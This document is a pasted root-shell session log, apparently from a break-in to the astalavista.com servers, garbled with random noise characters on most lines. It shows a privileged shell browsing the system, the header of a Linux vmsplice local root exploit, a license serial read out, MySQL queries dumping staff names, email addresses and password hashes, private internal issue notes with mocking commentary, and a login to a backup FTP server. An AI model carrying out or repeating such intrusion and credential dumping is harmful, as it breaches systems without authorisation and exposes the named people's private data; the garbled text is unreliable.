total 141208
' ]* g, j5 M( k; _, Fdrwx–x–x 10 com com 4096 Apr 28 12:40 .
- m% v8 R1 S U* B8 M* H1 wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% Y& n) q0 Q0 E z7 ^ _, Y
drwx—— 2 com com 4096 Jun 4 04:04 backups0 H2 S1 H& y/ e4 c. }5 _; g
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql8 q- V% ?% H9 ~* a1 x$ Z, K
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system+ x! @$ k& }* l3 r/ s. m' y7 ^6 _, l- {
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
4 ]/ d/ Z- W# G3 d, A-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout8 U; u) }2 V" r' p* g
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
. v! C+ c3 H* |9 @3 |( ^6 g-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc* e5 g1 L7 w! f6 G3 g
drwx–x–x 3 com com 4096 Jan 29 2008 domains" z5 T# {; X, ^* I
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed7 @( B) k. q3 k! V5 T/ e1 h
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
0 a9 j# p7 z; Q; p0 P-rw——- 1 com com 69 Nov 18 2008 .lesshst
& L4 g U. A2 c2 I) b- B+ ddrwx—— 2 com com 4096 Sep 24 2007 mail
+ U2 d. @* Q% ? N$ d-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
9 |7 J9 m) ^ A& Y7 I) Ndrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
* {9 r+ {7 C0 ~1 i) U) W; E9 z. @! |. wlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html5 G+ C9 G! R4 B' D, g
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow( {- i3 ?+ n, j9 _. }% m' n# O
drwx—— 2 com com 4096 Aug 26 2008 .ssh
- p$ p. \+ a q, {6 j" C! W. k6 W-rwx—— 1 com com 8515 Feb 10 2008 t1 q6 m8 j8 a2 }, v
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c! A! \& Y/ V4 R; u
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
4 s- Y' y9 T! P( V) n/ V-rw-rw-r– 1 com com 617 May 20 2008 .toprc" o+ f) G4 P0 d& d$ ~& F7 L
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
( p; a1 E7 y& A6 f% P-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
$ \1 i! _( R+ V7 }" `7 w-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc0 {* p, @; y4 D0 @. f1 T
$ \& N8 _2 ~' ]
sh-3.2# head t.c
9 V8 L5 }! W; P1 y$ [- J; y7 H/* E& K2 b8 ^4 _
* jessica_biel_naked_in_my_bed.c. ^ D& T; x7 M& n: k
*
6 y! E! c, U7 r* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
; l7 p5 E5 K: i5 S! G* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca./ `% N/ F6 Y! `7 Z6 J9 U* _
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
; E5 W9 T0 d% D( b/ T, e7 W& v- g7 F. \*, m' E2 _, E4 \9 s8 w
* Linux vmsplice Local Root Exploit$ o. @. g8 }, d; T8 z
* By qaaz
; m! o1 b% j6 z7 U, q% W' \0 F*! y- \" v, E1 k. ~
' {& |3 F6 K) F! F/ ^5 }. G9 Fsh-3.2# cd /8 M, C2 m- b# U3 ~! \8 J9 m. M
sh-3.2# ls -la
& `& K `& b% J, dtotal 360* U: |" b1 t: g, u" A* s: ?- K: m) @8 U
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .& ~# G5 Y; Y+ B5 x* n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' {' P! N2 E! J3 V( m2 Z8 W' W-rw——- 1 root root 10240 Jun 3 02:39 aquota.group8 }0 B/ U+ ]; h- F! `% P- I+ t8 T
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
$ [3 L" f/ l% p-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
/ z4 s. a. m7 c- P0 w-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck- g& @! T' C. A# G
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel8 o1 H. T, Y2 y, O( s
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
( p' M" N; ~) O# ?7 }% G1 ^5 vdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
) b8 o( ]; i( V( x7 u7 o8 J" Bdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
9 s& J% Z5 p* R; Y" vdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev+ O) W9 f2 P T7 y1 g2 ^
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
2 @3 ^" C- p: k5 z% _) f$ }0 pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
4 H5 Z* }. i6 v4 z-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
. b$ r# c* _" X% a* edrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib- W4 ^* ~- Q a0 x2 M+ L3 X7 H
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
$ n! d6 m) K0 u+ Odrwx—— 2 root root 16384 Sep 11 2007 lost+found% L8 r C5 _. ^4 d& T8 i4 X3 G
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
$ ^. j0 }) Z2 D: h k$ R0 Edrwxr-xr-x 2 root root 0 Jun 3 02:43 misc W$ |8 ^! f" j" z% y( n2 y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
7 L3 F% o& Y( ~" ]( L0 L. I-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
! a: e9 t0 l$ |+ I; C: ^7 U6 zdrwxr-xr-x 2 root root 0 Jun 3 02:43 net2 ^, Q4 c4 s1 ?" o K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
5 ~/ I! C) D' w: Wdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc: f& n0 d8 f# l' L7 o# y
drwxr-x— 15 root root 4096 Jun 4 08:40 root
( D! V; C0 H8 c6 N1 Odrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
- \0 \" G: c3 P6 v. k8 P7 Hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux5 u7 n2 }# w5 g1 g/ `8 ^
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv, e* |: G7 R2 V9 j
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys5 m& [+ [9 U6 y0 ^5 M0 [- ^% ?3 p
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp0 ?/ x1 y2 t' y1 j; V8 ^+ _
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
) n* {& t# o8 F, n; r9 s9 h' Sdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var: D- [8 D! V" B+ @# f# t; o- y
9 q2 X2 H; }: Y" ^/ Zsh-3.2# cd opt
* i3 s% A! m+ n* k) T o C, [4 ash-3.2# ls -la
9 j! T$ Y' h$ M" i$ Stotal 20
. } S2 X3 B9 sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .- Q4 ^0 f5 b, l# P
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' b1 Y" S5 S; X) D6 B6 fdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
8 j" \: t8 T* R0 y' [) U, H! I, h9 w( K3 _
sh-3.2# cd lsws/& x0 S* d* h. N0 R4 v; q
sh-3.2# ls -la
, k- _! Z' y/ P3 a7 u" Y1 G; j* A% utotal 108
3 J+ F" P$ _) o; k9 {drwxr-xr-x 15 root root 4096 Mar 20 2008 .
B" T% C9 d; i8 U8 t7 A% k, T$ Tdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..& e1 L0 X7 h/ u' o9 a! Y
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons* N1 A, e; N$ c' j$ ?7 m8 A6 l
drwxr-xr-x 13 root root 4096 May 29 15:10 admin' @, _: a- K* I3 j `
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate; {, U$ n4 f5 u
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
N7 @; ?- G2 f5 n4 Pdrwx—— 4 apache apache 4096 Jun 3 02:43 conf0 S9 O! w8 \' d q
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT9 s8 {. Y9 K: U9 f
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
5 ~* x( s. W e8 }; n0 u. wdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin( d9 _3 z9 j% P+ |( F0 e
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
! _& x& r# c2 x3 ?" c c# c1 F1 ?-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
( H* b8 V' ~4 z-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP: B- ]2 o% e2 z8 G9 E
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
2 w2 b. ]/ e7 L$ p-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
& Z6 h1 d- ]0 p; |1 j6 B# tdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs4 \. ?: M b/ A R. k' N, p5 h
drwxr-xr-x 2 root root 4096 Mar 20 2008 php0 a a$ {( y9 v8 Q
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild5 g8 J! N @& \5 h2 m7 z
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
# |. b0 j! F1 v! l. D-rw-r–r– 1 root root 6 May 29 15:10 VERSION
3 p4 P. G9 D1 p% H) @( ~
) c% ^' M* O7 D) Z5 Nsh-3.2# cd conf
: _9 b( w+ x) h& ssh-3.2# ls -la
; b* G# @: D1 @3 U2 ]4 A. j; E7 Xtotal 48; F; P9 W8 i, N
drwx—— 4 apache apache 4096 Jun 3 02:43 .
$ ]$ o9 x- J# Jdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
0 a/ Q* @# l5 R! h. B# {1 e! cdrwx—— 2 apache apache 4096 Mar 20 2008 cert% {' M; [0 r, T. m/ W
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml5 C6 U8 o/ K! A/ V1 C$ g
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak3 m5 }; ^6 \1 T0 w6 S
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
( @+ _( G& }' Z9 \-rw——- 1 apache apache 256 May 29 15:10 license.key
+ T( |4 d) J! R5 i6 e- r% t" w-rw——- 1 apache apache 256 Mar 21 2008 license.key.old& M/ N# b, Z3 Y: o; U3 ]
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
' e4 i. }0 L3 n1 R& W: u U" u6 R' T+ Q r-rw——- 1 apache apache 20 May 29 15:10 serial.no: A' X$ l* o/ c1 n
drwx—— 2 apache apache 4096 Mar 20 2008 templates7 ^ L1 l9 a; s# x$ j4 A1 t( e
) g! q& c7 u% Psh-3.2# cat serial.no
4 D4 S5 X9 F. V& T! ]0 O F: jIbDl-oVsO-CKqL-wVRa
: Z% ^( F$ O9 Z, X- K: [* H, W2 a4 u l* b, ^. ~4 {" i+ U
sh-3.2# mysql3 }6 R4 v6 G, Z9 e+ |- G! X# |$ R
Welcome to the MySQL monitor. Commands end with ; or \g.; j, X* J6 d. E7 s
Your MySQL connection id is 2868443 p' V& w% b# F0 T1 ~% [
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
% x1 M" x6 i- J" x3 f5 T5 y5 u# {+ I
6 J' m& H8 S# E: oType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) d* G; J: {3 ~& ?% H2 I1 O" M+ |7 R9 }* x5 b. T2 a" q
mysql> show databases;
8 B$ |7 `# y0 G/ \3 j7 @+———————–+; E0 N; r! p8 k/ M9 i+ E% \7 x
| Database |' \/ M$ T$ B: r$ ?1 W6 e2 H
+———————–+8 `, D6 {5 p' ]9 ?7 ~- o) E' I" a
| information_schema |
3 f3 B+ d% P' c. p4 m/ y# X3 D6 V| astanet_ads |" R8 t: o! r0 ^% I
| astanet_mailing_lists |+ s5 T7 B6 s, k9 Q# R9 ?
| astanet_mediawiki |. l- [; h1 G' Y$ _5 k
| astanet_membersystem |4 h- N5 t @5 }% l0 q
| com_contrexx |4 ^* {" {% o5 O" t* }
| com_contrexx2 |9 b7 W% O j" n/ h* F, X
| com_contrexx2_live |
9 y0 v- P7 S3 v$ t: E; y| da_roundcube |
% m/ s/ o" J: Z7 F| dolphin |
3 S6 H7 a3 d; D5 C7 |+ r2 B- ]8 v A| ideapool |
! ^6 I" v% _- {+ c9 C8 \1 ]| mysql |3 C* Y7 j+ U4 i: Z+ w7 D8 E2 s
| test |$ `; X% l- r( o& M
| yourmaster |
q- X# H( L2 W0 Z( y" x6 F+———————–+
8 P( |5 ~3 O5 g14 rows in set (0.00 sec)
; e% q& A$ @ }; v* ]9 q7 B% d" S# L- W" H+ o0 F2 H7 |* `
mysql> use ideapool- u1 O& }$ t3 l {, Z
Database changed
* Z: ~& t$ o4 c) H+ [mysql> show tables;) }2 [' l" { i% r; B
+———————————–+
% P7 r. g1 S& j| Tables_in_ideapool |0 C* X4 D; i& N7 b( J& l9 J0 ?
+———————————–+8 i9 d5 a3 r5 g8 H
| eventum_columns_to_display |
+ e, F( B! d* Z% W; k* l& ]# G$ f) h3 T| eventum_custom_field |
; |4 k- H: E/ N) t4 f1 T| eventum_custom_field_option |
; D+ g1 ?% p( S' h# ~| eventum_custom_filter |
* }" o8 }% r# \: c' U% Q% `| eventum_customer_account_manager |
% `. h5 ]/ d+ A| eventum_customer_note |1 ~) D: L# Y& P. A
| eventum_email_account |# u- ?* `0 D" w' d+ `+ B& ^
| eventum_email_draft |
# N Y8 E6 {" q9 s5 _5 E2 k3 u8 _| eventum_email_draft_recipient |8 K+ ~7 i9 b& k
| eventum_email_response |1 v2 S- X9 Y" l f/ X
| eventum_faq |
; V1 H/ t* Q$ E- X# M% J2 ?5 ^| eventum_faq_support_level |
( s9 j: _5 h7 x| eventum_group |$ l% s) J) P5 ^ J+ P+ m9 s" B3 @$ j
| eventum_history_type |
, w2 \2 M% I2 J2 s| eventum_irc_notice |
' g' F+ a: g% R) W| eventum_issue |( r- \2 Y8 j2 q2 u
| eventum_issue_association |
1 z \! }' y, `7 M7 C$ P- F' {' ]| eventum_issue_attachment |
4 \/ @3 K3 A8 Y1 a3 R) ]| eventum_issue_attachment_file |0 B& E' Z: c" l1 }! t) l5 A* M8 r
| eventum_issue_checkin |# o1 f% N/ O$ j4 V: a- ~
| eventum_issue_custom_field |
* x2 A$ J, y( A9 @& i! w9 X2 K| eventum_issue_history |
) J9 [0 A# M$ D5 V| eventum_issue_quarantine |3 n, c# j9 G# B- g5 T1 H$ Q% R) Z+ m
| eventum_issue_requirement |* J- Q0 u( a/ Q5 Z9 d+ L
| eventum_issue_user |
! h) B) g8 y. t! W( y8 P| eventum_issue_user_replier |5 V5 q. n7 S% a
| eventum_link_filter |* l3 _; L. c$ h6 ]( }6 i
| eventum_mail_queue |3 L3 `( M, m5 _0 Q! w5 e/ P
| eventum_mail_queue_log |+ H2 F7 N z6 D; V9 O5 \6 E
| eventum_news |
: c( X8 n+ N) P* e$ w# M| eventum_note |' Y* N$ ]3 K2 r) ]0 ]
| eventum_phone_support |" s9 x/ R1 O6 y: ^+ L3 G
| eventum_project |
9 f2 {6 z/ W. X* J1 F: e( D| eventum_project_category | F" }5 W% ]7 t X& c' i
| eventum_project_custom_field |8 Q( v! x3 F# p7 q+ v
| eventum_project_email_response |$ ^$ f8 a" R8 \% ]) P
| eventum_project_field_display |
3 F8 a2 f7 C* q5 L7 l. N/ i| eventum_project_group |
$ l, }# ?/ b- g8 _" || eventum_project_link_filter |
* L1 a, r' H1 W- b" X9 O3 B% R| eventum_project_news |. [2 u6 p1 r# T# \
| eventum_project_phone_category |
; ~5 c( |; z3 r| eventum_project_priority |" e$ ]/ q4 G- G" e( k1 @% @0 J# f
| eventum_project_release |
9 h1 M, A: J8 [& B( }| eventum_project_round_robin |
o; Z) C m+ c7 @; r; G| eventum_project_status |5 y, d# H/ B; B6 ?6 M& U2 r
| eventum_project_status_date |
" `3 q. j1 ?. i) p8 P. o/ Y9 }# p4 [| eventum_project_user |) l5 h- W6 G9 ~3 O6 l N$ V
| eventum_reminder_action |
( A3 m. T- ^$ E$ y2 R" I| eventum_reminder_action_list |/ o v9 R3 E c3 f
| eventum_reminder_action_type |
/ l) T8 o) \5 n4 l+ E7 r3 C| eventum_reminder_field |
+ C3 G( p0 `7 D8 o( O: E| eventum_reminder_history |
# E7 D$ p$ ~3 ]% y8 P6 l) r$ A| eventum_reminder_level |
. O6 o- b. ^4 e9 v| eventum_reminder_level_condition |
* J% ~/ C6 b, @, C* b- }| eventum_reminder_operator |* b% u: u! f) ]$ D9 I+ |2 b
| eventum_reminder_priority |
9 ^) U& h# u. I1 d/ o9 f| eventum_reminder_requirement |
3 l3 Y& U; _' G| eventum_reminder_triggered_action |
8 c5 `) h o6 I& H0 Y$ Z| eventum_resolution |& t! L$ \" Y8 X* [/ Q6 P
| eventum_round_robin_user |
1 B" i& f9 q% N; v; R& P| eventum_search_profile |
. `. i w+ o6 P" R9 D+ L3 R% `| eventum_status |
$ u l- D- @* Q- w( [9 t8 w| eventum_subscription |) U! _: l) a4 ]( j1 z1 n& F B( i& Z2 A
| eventum_subscription_type |( X- o& V9 {1 @
| eventum_support_email |: Z; e1 C. E! G$ s$ K) t! m4 q
| eventum_support_email_body |
4 v! ?! D( t! R; }4 l! r| eventum_time_tracking |
/ \5 A% z/ u5 k1 ]- C| eventum_time_tracking_category |- F9 }6 h! h* L8 _4 a( U/ H
| eventum_user |& n8 ?& {( o+ n) ?5 e
+———————————–+
' f8 h! Z( o2 y2 r+ m- A69 rows in set (0.00 sec)
( o; p$ B7 P! m& Z4 \8 E
* j: Z. q( b" C, {1 H6 K Y! J7 Jmysql> describe eventum_user;
% U. z6 W! q5 d, N% h. i+————————-+——————+——+—–+———————+—————-+/ T2 L& e- R- U- h4 \
| Field | Type | Null | Key | Default | Extra |6 ^- o* i H# L4 W1 \0 Y3 I- V
+————————-+——————+——+—–+———————+—————-+
, l; q2 C3 u4 e$ q) ~| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
6 V( T2 s' M# D6 @- V5 p, F- C| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
- ~' J6 K: j8 a| usr_customer_id | int(11) unsigned | YES | | NULL | |3 s6 v2 x; O5 m( g6 H, K. t
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
9 S" O. Y! |# u% o| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |7 e2 ], ^; E5 F
| usr_status | varchar(8) | NO | | active | |% Q( d" c# a' @' F( R
| usr_password | varchar(32) | NO | | | |( C& [* {( }; b; x& K0 ^
| usr_full_name | varchar(255) | NO | | | |
- c5 P; ]+ {8 |, e3 W* m| usr_email | varchar(255) | NO | UNI | | |
" y6 [, w' P% L4 c# j7 S| usr_preferences | longtext | YES | | NULL | |
- k4 E2 L3 I6 f4 C$ K% l) V5 J, h) q| usr_sms_email | varchar(255) | YES | | NULL | |+ R- Q+ `: a: _1 D2 _
| usr_clocked_in | tinyint(1) | YES | | 0 | |
1 Y; y! h8 A' @' Q$ ]! V8 B! R$ ?9 ~| usr_lang | varchar(5) | YES | | NULL | |% _/ X( F. Y% k/ f; X; P
+————————-+——————+——+—–+———————+—————-+
2 V, M2 f, s, {. H13 rows in set (0.00 sec)
0 c0 n# S& H$ N# N! f' D
9 b+ m/ j2 O' O3 X/ @mysql> select usr_full_name,usr_email,usr_password from eventum_user;
% W3 s% Y7 H% i; o+ M+ P# P5 c( ~+———————-+——————————-+———————————-+ X0 R0 M- x0 W d. ^
| usr_full_name | usr_email | usr_password |- X! b: p" Q! w/ P
+———————-+——————————-+———————————-+# k: L- X) {5 Q1 Q; q; q
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
: U4 e% }0 Z, V2 s& w5 C- f+ y; i6 d9 I| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |% t7 Z- @. Q" u" d w- n& X
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
`. w \ q( [6 K6 F| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
, B# ]1 \8 b) T9 q: U1 F| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |+ g' A A9 K" Q/ ^. @0 Y/ e
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |: P5 \6 r4 I7 ?' P0 z; V, w
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
' L( M/ G# V' C| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
! P) L/ d+ U" I* X- A| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |: j7 i2 R% R& B3 y7 a" U, p
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
0 a, d1 y, t( q, h8 G0 f7 N' a+ P| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |1 q, }& ^! t8 Z% e S% Q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
+ W. W! Q2 v7 K7 n| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
/ y: [+ B7 R: ]+ C. N+ Y| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |7 F2 `1 v7 x8 G( ^0 T: Y: j* n x; u
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |+ @, `1 }1 I: L0 ?1 K/ Q' D
+———————-+——————————-+———————————-+
( x7 f) t8 e& \8 ~$ {: u15 rows in set (0.00 sec)
' T5 z! [9 n8 T% Z# H$ r
' [4 @9 [* m( e$ e. q0 C$ cmysql> select iss_description from eventum_issue where iss_id = 43;
7 l- N( M, a9 x& z4 W8 x+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 z1 ]! I+ e& R1 ]| iss_description 6 H! q4 s; a! Q
|
. @9 |! p: o$ z2 H+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
0 t* C w- p! d- U+ {| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be# e3 \6 d; [! V1 \
connected for 90 mins… 120mins… so what i propose is something like:* q, y& F0 O; I" E3 p
链接标记[url]http://www.surfthechannel.com/[/url]
+ i2 N7 y ?8 u9 ^0 gsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
; ^2 z6 e. a; vlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t6 Z$ W" k& E1 s* O
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off7 H% K4 L6 k% _! ?% I ~& g
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…2 |( ]+ j8 w4 _- S) y% a
3 O1 Y# |( T: \We could also put advertisement during play on the flash video player itself… extra $$…
8 p* |( K4 A: H0 e# P% o
1 R }8 R) [5 o# WBy sykadul |% ~, W; T$ L6 F6 X9 Q8 |7 c
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' y' N) M+ n! h1 row in set (0.00 sec)
+ A; N. X; v8 k; I: L
7 K9 Z6 ]3 L6 m7 j# ^' e0 \" p// Money and extra $$ is all they care about. remember that.
4 j( ^" i. g1 s! R- y
) ?( N" M( B: l3 Q3 Q6 [ B. c* Emysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
; D6 V i2 O7 G+————————+——————————————————————————————————————————————————————————————————————————————-+( j; ^! Q+ \- `( D
| iss_summary | iss_description
. H) d8 {2 t# U6 }5 D: T|' V) O! ^, |; r4 S. \0 @: G
+————————+——————————————————————————————————————————————————————————————————————————————-+
2 b! H1 ]( h+ R- }| Forum for REAL EXPERTS | Hello,1 @, F0 d; D7 ?, F% r8 |
; U! i$ `3 J0 u) k$ ^3 @Ishtus and I," V8 [0 W+ p) e( ?4 g
$ ]6 A ~" A- FCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide: |# Y8 D2 o5 V4 M* h: y
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.. o* ]9 j5 ~- F% }9 {
: g1 z/ S; m7 w2 }4 {/ y
One example a friend of mine from coresecurity.com!& Z1 c }, I* o) s
5 d! Z8 n/ ]0 B
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
+ B$ Q1 @; O; K3 {
4 N6 A( G g; q, T& ]/ t|
: r' F; y+ d' ]: j o+ G# [+————————+——————————————————————————————————————————————————————————————————————————————+
$ W1 h6 O) N' `) l7 j4 }6 x" L( `1 row in set (0.00 sec)( l( t8 U# U' G* b% t
* ~" [) i# [+ J3 \: G9 b9 k. F
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& e6 O3 U$ v7 _: q/ h. E6 u
, Z; N: b2 l/ u& L; s& B4 kmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
, f* c4 b4 A, s6 _# ]9 T+——————+———————————————————————————————+, N7 F6 Y/ p2 {+ N
| iss_summary | iss_description |$ W Q: Q* ?1 Z5 g4 D+ J* o
+——————+———————————————————————————————+
7 _, d5 `8 ?6 [" O. A| Website guidance | Virtual Girl which guides you trought the website.
( N T: }' N! j% [6 e$ j- D) z$ h( i8 {% `( \; a, b; e
We need a girl with who you can ( talk )!!!( @, G8 }# _2 s) n% y8 L
Also for the News!* E$ w1 a0 G1 Y3 u2 {+ z$ {4 W5 V
So my suggestion is a girl who read you the news loud if you like!8 L9 }" _( F+ {3 L1 c h
you can choose between read yourselfe or she read it for you or both!
4 _: s& E$ r, ~1 i' r8 }. `+ B, X* s5 _% u$ {' ~* \; {$ T! x
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
4 A0 X9 T8 O6 g* Z. A
9 ]' U2 H, [; pHave a look on the example girls!!
; b1 y C1 X0 E, v T$ }; ^' \) \* X: v0 n* r" P
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]; o8 ?/ ^( v9 |# q' W( U. j
( U% F4 d4 X# X6 v5 k2 Zor that
# I4 k$ f" d) b ~7 ^5 m( `/ M! D. `4 n
链接标记[url]http://www.yellostrom.de/[/url]
: V8 O% w+ d: Q: F( x, ^0 I5 O
|
+ @2 b) R* C& J% g: [: O+——————+———————————————————————————————+1 Y8 W% p2 N1 d" e% Y, H
1 row in set (0.00 sec)
; k; c- C( j3 H" Y% O1 X+ d8 } i9 d5 L( t
// ha ha.1 R) }' N1 z1 d) e) l5 _ x6 g! T
# y( ~7 L4 X! U
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
! Z! V6 |3 ^ c' b* q+————————–+———————————————————————————————————–+
; u, K% y8 G5 s# A| iss_summary | iss_description |
, {4 c! m0 @& ?: E7 D# e+————————–+———————————————————————————————————–+( i. B2 [& H: u4 ] R9 r; H
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
6 R. l7 X/ c& _! n+————————–+———————————————————————————————————–+6 {9 _- t: T/ U7 @
1 row in set (0.00 sec)6 h0 w" L% X5 L0 p* @' g
% I7 w* T& j$ N2 m$ b* w4 I
// LOL.7 z- Z9 E& M. L8 C
* `$ z' n' e$ M. ^, C% S- J
mysql> exit8 X& t9 Q; g1 \ V2 c1 k" C/ \) `
Bye
) f! O6 O% t7 l! e' \; y1 z5 M- ~+ \- k* W7 Y% t1 [
sh-3.2# ftp 212.254.194.163! |( X6 q. `. ~
Connected to 212.254.194.163.
4 T1 F) Z$ M. w1 Y220 BackupCOM_VW FTP server ready.# {( w% M' c; R2 D5 p
504 AUTH: security mechanism ‘GSSAPI’ not supported.
9 m+ G; F; v( `! {+ Z4 n- p504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
8 b$ k- C( \- r) L3 `KERBEROS_V4 rejected as an authentication type1 e7 `: b `. M, m+ c! p! o. g
Name (212.254.194.163:root): astalavista.com
5 ? O; z' L, `2 a" r; X m331 Password required for astalavista.com.
9 q: ^0 ]1 W5 C, rPassword:, X* X+ [3 |2 S" W& y8 q
230 User astalavista.com logged in.2 b- j! x- ]0 V; J: K w
Remote system type is UNIX.
4 ^6 u* {+ W& Q: ]Using binary mode to transfer files.
6 b5 {( K. L0 m3 o" Q: nftp> ls -la5 d5 |; H' r E. I8 r# d& Z
227 Entering Passive Mode (212,254,194,163,2,188)9 y0 Z- ^6 V9 m2 t
150 Opening BINARY mode data connection for ‘file list’./ `/ r& M4 S& R+ n
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
